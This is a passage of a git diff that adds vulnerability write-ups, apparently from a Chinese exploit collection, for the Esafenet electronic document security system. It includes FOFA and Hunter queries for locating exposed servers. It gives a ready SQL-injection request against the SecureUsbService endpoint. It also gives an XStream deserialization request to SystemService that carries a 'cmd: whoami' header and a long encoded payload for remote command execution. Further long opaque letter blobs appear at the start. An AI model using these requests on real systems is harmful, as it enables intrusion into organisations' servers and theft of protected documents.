GDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706604333973-57c3de91-84f6-484a-af9f-0de84ba3f891.png](./img/UMEwMTQGUBCHmlTs/1706604333973-57c3de91-84f6-484a-af9f-0de84ba3f891-321881.png)
+
+
+
+> 更新: 2024-04-20 22:01:34  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ahuzo9kgc2ggsydb>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统SecureUsbService存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统SecureUsbService存在SQL注入漏洞.md
new file mode 100644
index 0000000..e21ca7b
--- /dev/null
+++ b/亿赛通电子文档安全管理系统SecureUsbService存在SQL注入漏洞.md
@@ -0,0 +1,21 @@
+# 亿赛通电子文档安全管理系统SecureUsbService存在SQL注入漏洞
+
+亿某通电子文档安全管理系统` SecureUsbService`接口的`id`参数处对传入的数据没有预编译和充足的校验，导致该接口存在SQL注入漏洞，恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限
+
+## fofa
+
+```yaml
+app="亿赛通-电子文档安全管理系统"
+```
+
+## poc
+
+```javascript
+POST /CDGServer3/device/SecureUsbService;login HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+
+command=DelSecureUsb&id=a';WAITFOR+DELAY+'0:0:5'--
+```
+
diff --git a/亿赛通电子文档安全管理系统SystemService存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统SystemService存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..52f090b
--- /dev/null
+++ b/亿赛通电子文档安全管理系统SystemService存在xstream反序列化漏洞.md
@@ -0,0 +1,60 @@
+# 亿赛通电子文档安全管理系统SystemService存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统SystemService存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/Ee_yrEjypi5abc_7/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-850395.png)
+
+# 四、漏洞复现
+```java
+POST /CDGServer3/SystemService?command=GETSYSTEMINFO HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJ